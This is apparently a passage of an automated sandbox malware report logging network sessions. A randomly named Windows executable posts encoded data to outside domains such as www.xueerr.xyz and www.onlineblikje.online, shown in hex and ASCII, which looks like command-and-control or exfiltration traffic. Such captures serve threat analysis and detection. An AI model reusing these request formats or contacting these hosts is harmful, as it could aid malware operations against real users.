                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 42 6f 68 65 3d 4c 36 2f 49 67 52 37 6a 6e 57 67 48 41 71 43 55 57 74 64 54 6e 79 51 33 4b 4f 4d 6f 46 36 69 79 2f 67 56 78 6c 35 32 4a 30 6e 55 2b 53 56 73 35 73 72 4d 47 36 4e 44 79 79 6c 41 6e 78 55 4f 78 57 42 71 57 71 4c 6e 46 57 33 6e 5a 69 6f 43 54 36 55 71 58 4b 43 37 7a 62 73 4b 63 34 42 54 50 7a 43 4d 41 59 2b 6e 58 6d 7a 41 63 50 6f 76 67 61 6d 75 53 49 32 67 68 64 45 4d 6e 48 6a 65 6e 70 41 3d 3d 26 76 44 3d 68 30 65 38 35 76 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=L6/IgR7jnWgHAqCUWtdTnyQ3KOMoF6iy/gVxl52J0nU+SVs5srMG6NDyylAnxUOxWBqWqLnFW3nZioCT6UqXKC7zbsKc4BTPzCMAY+nXmzAcPovgamuSI2ghdEMnHjenpA==&vD=h0e85v"}</script></head></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              45192.168.2.550027129.226.176.90802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:30.652751923 CEST734OUTPOST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 71 78 68 4c 33 63 64 72 30 47 59 30 4d 67 4f 62 33 33 4a 73 66 59 68 73 31 78 76 4d 4d 66 73 70 51 58 77 36 2b 78 59 76 75 68 31 47 33 44 4d 41 74 50 6e 37 50 6b 76 4a 30 50 4d 36 47 67 6d 71 4d 30 31 65 41 65 61 38 34 34 51 65 68 6c 53 6d 57 34 77 76 61 44 73 77 4f 62 76 37 53 49 43 4c 5a 51 49 41 38 68 51 4c 46 4e 62 39 73 30 50 31 66 36 45 79 38 55 6f 6f 2f 34 78 30 56 63 65 36 43 6b 73 48 54 4b 30 2f 54 46 6f 6a 67 5a 35 30 30 33 72 58 73 2b 73 6a 30 7a 50 4c 78 65 6b 74 67 4d 69 46 6b 44 30 74 61 36 68 65 4c 5a 55 6a 55 75 65 6e 44 33 78 31 39 4a 78 44 44 6a 48 2f 67 33 52 31 75 41 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=bqxhL3cdr0GY0MgOb33JsfYhs1xvMMfspQXw6+xYvuh1G3DMAtPn7PkvJ0PM6GgmqM01eAea844QehlSmW4wvaDswObv7SICLZQIA8hQLFNb9s0P1f6Ey8Uoo/4x0Vce6CksHTK0/TFojgZ5003rXs+sj0zPLxektgMiFkD0ta6heLZUjUuenD3x19JxDDjH/g3R1uA=
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:31.602010965 CEST295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:31 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              46192.168.2.550028129.226.176.90802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:33.201466084 CEST754OUTPOST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 71 78 68 4c 33 63 64 72 30 47 59 31 73 51 4f 5a 55 66 4a 39 76 59 69 79 46 78 76 46 73 66 6f 70 58 66 77 36 36 70 49 76 63 46 31 44 6c 62 4d 42 73 50 6e 34 50 6b 76 42 55 50 46 2b 47 67 70 71 4d 77 58 65 43 61 61 38 37 45 51 65 6a 74 53 6d 6c 51 7a 70 4b 44 75 6c 65 62 68 2f 53 49 43 4c 5a 51 49 41 34 41 4e 4c 46 56 62 38 63 6b 50 31 2b 36 44 78 38 55 33 72 2f 34 78 77 56 63 61 36 43 6c 35 48 53 6d 4b 2f 52 4e 6f 6a 68 70 35 30 6c 33 30 64 73 2b 51 6e 30 7a 59 62 78 6a 55 69 47 4d 32 43 43 62 38 39 4c 65 45 62 39 30 2b 35 32 6d 32 30 6a 62 4a 6c 75 42 47 53 7a 43 75 6c 44 6e 68 72 35 58 56 39 42 77 41 48 69 33 35 69 72 33 61 57 30 32 63 69 45 7a 67
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=bqxhL3cdr0GY1sQOZUfJ9vYiyFxvFsfopXfw66pIvcF1DlbMBsPn4PkvBUPF+GgpqMwXeCaa87EQejtSmlQzpKDulebh/SICLZQIA4ANLFVb8ckP1+6Dx8U3r/4xwVca6Cl5HSmK/RNojhp50l30ds+Qn0zYbxjUiGM2CCb89LeEb90+52m20jbJluBGSzCulDnhr5XV9BwAHi35ir3aW02ciEzg
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:34.162050962 CEST295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:34 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              47192.168.2.550029129.226.176.90802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:35.748178959 CEST1771OUTPOST /vhqd/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Origin: http://www.xueerr.xyz
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.xueerr.xyz/vhqd/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 62 71 78 68 4c 33 63 64 72 30 47 59 31 73 51 4f 5a 55 66 4a 39 76 59 69 79 46 78 76 46 73 66 6f 70 58 66 77 36 36 70 49 76 63 4e 31 66 45 37 4d 42 50 6e 6e 35 50 6b 76 50 30 50 49 2b 47 67 77 71 49 63 54 65 43 57 77 38 2b 41 51 59 47 68 53 74 30 51 7a 6e 4b 44 75 36 75 62 73 37 53 49 62 4c 5a 42 42 41 38 6b 4e 4c 46 56 62 38 61 67 50 68 2f 36 44 39 63 55 6f 6f 2f 35 2b 30 56 63 32 36 47 4a 70 48 53 54 2f 2b 6c 35 6f 69 42 35 35 31 58 66 30 52 73 2b 6f 67 30 79 64 62 78 76 4c 69 47 34 41 43 43 47 6e 39 49 4f 45 62 4b 35 70 74 55 36 33 68 44 54 4a 76 75 39 6a 46 6d 37 4d 38 44 65 57 6f 61 6a 72 35 52 59 65 52 7a 7a 48 32 70 75 4e 41 44 79 56 69 79 76 75 68 6e 70 30 76 46 50 6f 47 6d 74 58 7a 30 48 53 73 79 45 47 65 48 77 35 55 41 6c 55 58 47 61 76 7a 2f 4e 42 75 65 34 33 65 78 61 6d 74 46 6f 78 79 4a 79 41 47 52 45 6d 41 38 6e 73 4c 4b 58 70 57 35 6f 4f 6d 35 59 67 50 31 33 51 44 6d 56 75 41 78 66 32 39 77 2b 77 5a 76 72 67 37 45 44 4b 4a 6a 69 70 49 71 66 77 48 52 72 4b 50 35 4d 58 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=bqxhL3cdr0GY1sQOZUfJ9vYiyFxvFsfopXfw66pIvcN1fE7MBPnn5PkvP0PI+GgwqIcTeCWw8+AQYGhSt0QznKDu6ubs7SIbLZBBA8kNLFVb8agPh/6D9cUoo/5+0Vc26GJpHST/+l5oiB551Xf0Rs+og0ydbxvLiG4ACCGn9IOEbK5ptU63hDTJvu9jFm7M8DeWoajr5RYeRzzH2puNADyViyvuhnp0vFPoGmtXz0HSsyEGeHw5UAlUXGavz/NBue43examtFoxyJyAGREmA8nsLKXpW5oOm5YgP13QDmVuAxf29w+wZvrg7EDKJjipIqfwHRrKP5MXQTIM3ze0AZQBi6Qqko/CsP6dfN8oEg2ZENFBufB6k8MeGwaHdBjzcWBdKVChjxDiO5xAgQ441xMRZAnazCMnYHQ/R7Q6cj0uhOuT4Dirn6FY/vRhRuwH7bQUMl8HMwsVvdma5xDJ776ndrWdzMQO8gIwt9TiNRmq3PE7OnGx6pUEGOhkDnYJQmWWNR+XIJrJq33aytyiogsr/HYFm+Y9TwIzJSfcxglb0CbpdG2Uq4lMqhtniAvV+vn7m8/RD1PpCg9Pr8w+m85hoaLOt4bbWl/r1uNyC1VP1TFNedTDVyMZ571bq+WmmX/8TLuK6ty1cA+2w1vCxcPa09uwdx9hqwHKbYZa6tMWx8shjLbHIlok0aRTeclQjwLvlc9CTJNSIaBI3U5l3sgjQDC2u0cNANnsClq5iN85vBJp/IAcAMUr53MjPHpYPIoylQiuk9JpQDJwT4fi81r9nwhTZg/UQmKJagPaFZnAgnZt4MXcmdq4eOgbFj4/jjrdUWWgSKBmVlMegP8y/VOAp7lsdrmxBntAZBeCd5Jy7+UfLC5vtkwhOlnLhul/n8XOQz33xul2J6c8dU85wtVaa9Unn8iVvzrJyh/D18C6O2ZxJVtJz6pBu/yfpiGaQU0pXu/mzobNlPMAY3EK5osrPIfxJggjtFuzkVu7YIRA2T [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:36.713831902 CEST295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:36 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              48192.168.2.550030129.226.176.90802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:38.291840076 CEST480OUTGET /vhqd/?7Bohe=WoZBIA9oyl+J2b4VfTP9l9A782ZII/35uSr01551g8NzakXtA+Pa5+JAPkHp6kowgs8acnK71ZwIZDZByVYOuYH08N3N2lAmC4I9AOVCDFEu0aUC6s+F7cMMpoEI61JPvA==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.xueerr.xyz
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:39.252938032 CEST295INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:39 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 150
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              49192.168.2.550031213.249.67.10802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:44.486295938 CEST761OUTPOST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 77 44 58 52 4e 65 32 63 49 72 2b 6b 72 61 68 43 42 70 69 68 65 44 6a 53 30 30 73 76 72 65 76 4e 68 57 67 6b 69 44 62 41 7a 61 52 73 72 79 4a 62 74 71 72 57 62 6e 7a 79 67 71 74 52 77 30 53 59 7a 39 57 38 71 6f 36 30 77 49 4e 50 33 54 69 6b 4b 4c 74 4a 38 78 34 46 78 46 68 6b 33 70 75 55 49 52 5a 4f 63 49 4a 69 50 62 43 51 67 66 43 30 55 77 2b 59 78 76 59 61 75 4f 47 4f 67 33 41 31 71 4f 73 70 63 49 65 72 78 49 43 37 78 57 76 6a 6c 33 62 58 65 70 75 77 73 73 4e 54 33 51 57 39 7a 58 57 41 59 54 63 35 50 34 37 34 55 54 51 61 6e 76 74 62 6c 59 38 53 59 54 6f 44 56 37 50 66 69 61 72 56 4f 6c 63 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+krahCBpiheDjS00svrevNhWgkiDbAzaRsryJbtqrWbnzygqtRw0SYz9W8qo60wINP3TikKLtJ8x4FxFhk3puUIRZOcIJiPbCQgfC0Uw+YxvYauOGOg3A1qOspcIerxIC7xWvjl3bXepuwssNT3QW9zXWAYTc5P474UTQanvtblY8SYToDV7PfiarVOlc=
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:45.318584919 CEST206INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:45 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              50192.168.2.550032213.249.67.10802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.026241064 CEST781OUTPOST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 77 44 58 52 4e 65 32 63 49 72 2b 6b 72 2f 70 43 44 49 69 68 66 6a 69 67 6f 6b 73 76 69 2b 76 4a 68 57 73 6b 69 43 66 51 7a 6f 6c 73 71 53 35 62 73 72 72 57 63 6e 7a 79 72 4b 74 4e 30 30 53 66 7a 39 4b 30 71 6f 47 30 77 49 5a 50 33 52 36 6b 4b 38 35 4b 75 52 34 44 33 46 68 6d 39 4a 75 55 49 52 5a 4f 63 4d 68 63 50 61 71 51 67 75 79 30 53 54 6d 62 33 66 59 64 74 4f 47 4f 6b 33 42 79 71 4f 74 5a 63 4a 44 4d 78 4c 36 37 78 58 66 6a 6c 6a 33 59 52 70 75 71 6a 4d 4d 55 78 42 58 30 38 55 61 32 61 52 6c 54 58 71 44 4b 59 46 39 77 39 4e 6c 7a 32 34 51 71 49 41 67 30 45 4c 75 32 34 35 37 6c 51 79 4a 59 6e 4a 78 67 45 64 75 57 50 39 61 6e 39 78 77 4c 42 66 34 5a
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=wDXRNe2cIr+kr/pCDIihfjigoksvi+vJhWskiCfQzolsqS5bsrrWcnzyrKtN00Sfz9K0qoG0wIZP3R6kK85KuR4D3Fhm9JuUIRZOcMhcPaqQguy0STmb3fYdtOGOk3ByqOtZcJDMxL67xXfjlj3YRpuqjMMUxBX08Ua2aRlTXqDKYF9w9Nlz24QqIAg0ELu2457lQyJYnJxgEduWP9an9xwLBf4Z
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:47.869518995 CEST206INHTTP/1.1 302 Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:20:47 GMT
                                                                                                                                                                                                                                              Server: Apache/2.4.56 (Debian)
                                                                                                                                                                                                                                              Location: https://onlineblikjes.nl/
                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              51192.168.2.550033213.249.67.10802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:49.572637081 CEST1798OUTPOST /z0t0/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.onlineblikje.online
                                                                                                                                                                                                                                              Origin: http://www.onlineblikje.online
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.onlineblikje.online/z0t0/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 77 44 58 52 4e 65 32 63 49 72 2b 6b 72 2f 70 43 44 49 69 68 66 6a 69 67 6f 6b 73 76 69 2b 76 4a 68 57 73 6b 69 43 66 51 7a 6f 64 73 71 68 78 62 74 49 7a 57 64 6e 7a 79 6f 4b 74 4f 30 30 54 44 7a 39 43 4f 71 6f 4b 6b 77 4b 68 50 33 79 79 6b 49 49 56 4b 33 68 34 44 36 6c 68 6c 33 70 75 42 49 52 4a 4b 63 49 46 63 50 61 71 51 67 74 36 30 56 41 2b 62 31 66 59 61 75 4f 48 42 67 33 42 57 71 50 45 68 63 49 33 32 79 36 61 37 77 33 50 6a 6d 57 62 59 63 70 75 30 33 73 4d 32 78 45 50 33 38 55 47 41 61 56 73 38 58 70 54 4b 61 51 55 59 36 2b 64 62 72 34 63 77 4a 69 34 4a 62 62 6d 6d 32 36 44 43 55 56 70 6f 6a 64 70 35 44 4e 48 56 4b 2b 6a 51 6a 6b 73 76 48 6f 4a 4d 35 31 56 51 66 42 61 70 39 4d 59 72 6b 66 69 65 38 48 58 79 53 78 6f 79 4e 49 54 33 6e 6b 63 7a 41 48 33 34 4f 4b 47 6e 62 64 2b 79 4e 78 79 76 2b 47 70 57 4e 56 50 67 69 7a 49 77 39 6a 2b 6b 4b 59 6a 67 6f 57 37 64 50 66 59 37 50 75 37 2b 38 77 72 76 62 36 34 68 73 49 46 37 35 54 2b 73 52 33 48 41 43 4a 66 56 55 2f 75 59 57 6a 4f 7a [TRUNCATED]
